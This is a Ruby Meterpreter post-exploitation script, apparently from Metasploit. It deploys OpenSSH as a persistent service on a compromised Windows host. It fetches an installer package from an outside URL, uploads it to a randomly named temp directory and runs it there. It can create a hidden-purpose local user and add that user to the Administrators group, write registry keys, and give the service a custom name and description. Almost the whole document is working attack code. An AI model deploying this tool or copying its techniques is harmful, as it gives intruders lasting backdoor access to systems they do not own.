# # meterpreter-script to deploy + run OpenSSH # on the target machine # # written by Oliver "illegalguy" Kleinecke # v.1.0 2010-04-25 # require 'net/http' meter_type = client.platform # # Options # @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], "-f" => [ true, "The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com"], "-U" => [ true, "Download OpenSSH-SFX from given URL"], "-u" => [ true, "Add windows-user (autoadded to local administrators"], "-p" => [ true, "Password for the new user"], "-r" => [ false, "Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)"], "-I" => [ true, "Install OpenSSH to the given directory"], "-F" => [ false, "Force overwriting of registry-values"], "-S" => [ true, "Set custom service description"], "-N" => [ true, "Set custom service name"], "-m" => [ true, "Do not start the OpenSSH-service after installation"], "-t" => [ true, "Set start-type of the service to manual (Default: auto)"] ) def usage print_line("OpenSSH-server deploy+run script") print_line("This script will deploy OpenSSH + run the SSH-server as a service") print_line(@@exec_opts.usage) raise Rex::Script::Completed end def createkey(key) root_key, base_key = client.sys.registry.splitkey(key) open_key = client.sys.registry.create_key(root_key, base_key) end def deletekey(key) root_key, base_key = client.sys.registry.splitkey(key) rtrncode = client.sys.registry.delete_key(root_key, base_key) return rtrncode end def setval(key, value, data, type = "REG_SZ") root_key, base_key = client.sys.registry.splitkey(key) open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE) open_key.set_value(value, client.sys.registry.type2str(type), data) end def queryval(key, value) root_key, base_key = client.sys.registry.splitkey(key) hkey = client.sys.registry.open_key(root_key, base_key) valdata = hkey.query_value(value) return valdata.data end # Wrong Meterpreter Version Message Function #------------------------------------------------------------------------------- def wrong_meter_version(meter = meter_type) print_error("#{meter} version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end # # Default values # extractfilename = File.join(Msf::Config.data_directory, "/openssh-extract.sfx") manual = false username = "none" password = nil downloadurl = 'http://updates.metasploit.com/data/win32-ssh/openssh.sfx' uninstall = nil installpath = nil license = 'Please go to https://olex.openlogic.com/licenses/openssh-license for license information!' extractexe = nil warning = 'Script stopped. There are openssh/cygwin-registrykeys on the target host. Please uninstall the service(s) first, or use -F!' forced = nil servicename = "OpenSSHd" servicedesc = "OpenSSH-Server" noauto = false dirname = nil type = "auto" # # Option parsing # @@exec_opts.parse(args) { |opt, idx, val| case opt when "-h" usage when "-f" if !val print_error("-f requires the SFX-filename as argument !") usage end extractfilename = val if not ::File.exists?(extractfilename) print_error("OpenSSH-SFX not found/accessible!") usage end manual = true when "-U" if !val print_error("-U requires the download-URL for the OpenSSH-SFX as argument !") usage end downloadurl = val when "-p" if !val print_error("-p requires the password (for the windows-user to add) as argument !") usage end if val.length > 14 print_error("Password must not be longer than 14chars due to \"net user .. /ADD\" restrictions, sorry !") usage end password = val when "-u" if !val print_error("-u requires the username (for the windows-user to add) as argument!") usage end username = val when "-r" uninstall = true when "-I" if !val print_error("-I requires a directory-name to use as installpath") usage end dirname = val when "-F" forced = true when "-S" if !val print_error("-S requires s custom string to use as the service-description") usage end servicedesc = val when "-N" if !val print_error("-N requires a custom string to use as service-name") usage end servicename = val when "-m" noauto = true when "-t" type = manual else print_error("Unknown option: #{opt}") usage end } # Check for Version of Meterpreter wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i # # Uninstall if selected # if uninstall username = nil servicename = nil begin dirname = queryval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "native") rescue print_status("Could not find any sshd installed by this script. Please remove manually!") deletekey("HKLM\\Software\\Cygnus\ Solutions") raise Rex::Script::Completed end uninstallfile = "#{dirname}\\etc\\uninst.bak" uf = client.fs.file.new(uninstallfile, "rb") while not uf.eof? linesarray = uf.read.split("\r\n") username = linesarray[0] servicename = linesarray[1] end uf.close # stop sshd-service, delete it, delete user + files afterwards print_status("Stopping the #{servicename}-service....") client.sys.process.execute("cmd.exe", "/c sc stop #{servicename}") sleep 2 print_status("#{servicename} has been stopped.") print_status("Deleting the #{servicename}-service....") client.sys.process.execute("cmd.exe", "/c sc delete #{servicename}") sleep 1 print_status("#{servicename} has been deleted.") unless username.strip == "none" print_status("Deleting user #{username}......") client.sys.process.execute("cmd.exe", "/c net user #{username} /DELETE") print_status("User #{username} has been deleted") end print_status("Deleting the directory #{dirname}....") client.sys.process.execute("cmd.exe", "/c rmdir /S /Q #{dirname}") print_status("#{dirname} has been deleted.") print_status("Deleting regkeys ....") deletekey("HKLM\\Software\\Cygnus\ Solutions") print_status("Registry-keys have been deleted .") print_status("Uninstall completed!") raise Rex::Script::Completed end # # Check for OpenSSH/Cygwin - Regkeys first and bail out if they exist # root_key, base_key = client.sys.registry.splitkey("HKLM\\Software\\Cygnus\ Solutions") open_key = client.sys.registry.open_key(root_key, base_key) keys = open_key.enum_key if ( keys.length > 0) if not forced print_error(warning) raise Rex::Script::Completed end end # # If file doesn`t exist and file was not manually specified : auto-download # if manual == false if not ::File.exists?(extractfilename) print_status("openssh-extract.sfx could not be found. Downloading it now...") print_status(license) extractexe = Net::HTTP.get URI.parse(downloadurl) open(extractfilename, "wb") { |fd| fd.write(extractexe) } print_status("openssh-extract.sfx has been downloaded to #{extractfilename} (local machine). Please remove manually after use or keep for reuse.") downloaded = true end end # # Generate sshd-dir + upload file to client # if dirname == nil dirname = client.fs.file.expand_path("%TEMP%") + '\\' + "#{rand(36 ** 8).to_s(36).rjust(8,"0")}" print_status("Creating directory #{dirname}.....") client.fs.dir.mkdir(dirname) else if !::File.exists?(dirname) && !::File.directory?(dirname) print_status("Creating directory #{dirname}.....") client.fs.dir.mkdir(dirname) end end fileontrgt = "#{dirname}\\#{rand(36 ** 8).to_s(36).rjust(8,"0")}.exe" print_status("Uploading #{extractfilename} to #{fileontrgt}....") client.fs.file.upload_file(fileontrgt, extractfilename) print_status("#{extractfilename} successfully uploaded to #{fileontrgt}!") # Get required infos about the target-system clientenv = Hash.new envtxtname = "#{dirname}\\#{rand(36 ** 8).to_s(36).rjust(8,"0")}.txt" client.sys.process.execute("cmd.exe", "/c set > #{envtxtname}") fd = client.fs.file.new(envtxtname, "rb") while not fd.eof? linesarray = fd.read.split("\r\n") linesarray.each { |line| currentline = line.split('=') envvarname = currentline[0] envvarvalue = currentline[1] clientenv[envvarname] = envvarvalue } end fd.close # Do not continue if client-os is not valid unless clientenv["OS"] == 'Windows_NT' print_error("This script will run on Windows-NT based OS only!") raise Rex::Script::Completed end # Extract the files print_status("Extracting the files ...") client.sys.process.execute(fileontrgt) sleep 3 print_status("Files extracted .. ") # # Import required registry keys # homebase = clientenv["ALLUSERSPROFILE"].slice(0,clientenv["ALLUSERSPROFILE"].rindex('\\')) createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2") createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/") setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "native", dirname) setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "flags", 10, "REG_DWORD") createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home") setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home", "native", homebase) setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home", "flags", 10, "REG_DWORD") createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin") setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin", "native", "#{dirname}/bin") setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin", "flags", 10, "REG_DWORD") createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\Program Options") # # Provide ACL for System User # client.sys.process.execute("cacls.exe", "#{dirname} /E /T /G SYSTEM:F") # # Add windows-user if requested # unless username == "none" if password == nil print_error("You need to provide a nonempty password for the user with the \"-p\"-parameter!") usage end #Get localized name for windows-admin-grp admingrpname = nil client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\groupnames.txt") sleep 1 fd = client.fs.file.new("#{dirname}\\groupnames.txt", "rb") while not fd.eof? linesarray = fd.read.split("\n") linesarray.each { |line| if line[0..4] =~ /[aA]dmin/ admingrpname = line.slice!(/[aA]dmin[a-z]+/) end } end fd.close sleep 2 client.fs.file.rm("#{dirname}\\groupnames.txt") print_line("Adding user #{username}....") client.sys.process.execute("cmd.exe", "/c net user #{username} #{password} /ADD /HOMEDIR:#{dirname}") print_line("Add user #{username} to #{admingrpname}") client.sys.process.execute("cmd.exe", "/c net localgroup #{admingrpname} #{username} /ADD") end # # Generate /etc/passwd + /etc/group files # print_status("Generating /etc/passwd + /etc/group files....") client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkpasswd.exe -l > #{dirname}\\etc\\passwd") client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\etc\\group") # # Generate SSH-keypairs # print_status("Generating SSH-keys .....") client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t dsa -f /etc/ssh_host_dsa_key -N \"\"") sleep 1 client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t rsa1 -f /etc/ssh_host_key -N \"\"") sleep 1 client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t rsa -f /etc/ssh_host_rsa_key -N \"\"") # # Add OpenSSH - Service # print_status("Adding OpenSSHd-Service.......") if type == manual client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\cygrunsrv.exe --install #{servicename} --path /usr/sbin/sshd --args \"-D\" --dep \"Tcpip\" --stderr \"/var/log/opensshd.log\" --env \"CYGWIN=binmode ntsec tty\" --type manual --disp \"#{servicedesc}\"") else client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\cygrunsrv.exe --install #{servicename} --path /usr/sbin/sshd --args \"-D\" --dep \"Tcpip\" --stderr \"/var/log/opensshd.log\" --env \"CYGWIN=binmode ntsec tty\" --disp \"#{servicedesc}\"") end print_status("Service successfully installed!") sleep 2 # # Save "settings" to txtfile, to be able to del correct user etc afterwards # uninstallfile = "#{dirname}\\etc\\uninst.bak" uf = client.fs.file.new(uninstallfile, "w") uf.write "#{username} \r\n" uf.write "#{servicename} \r\n" uf.close # Run OpenSSH-service unless noauto was specified unless noauto print_status("Starting OpenSSH-Service....") client.sys.process.execute("cmd.exe", "/c net start #{servicename}") sleep 1 print_status("OpenSSHd has been started!") end # Display OpenSSH-Hostkey, so that user may pass this to sshclient-script directly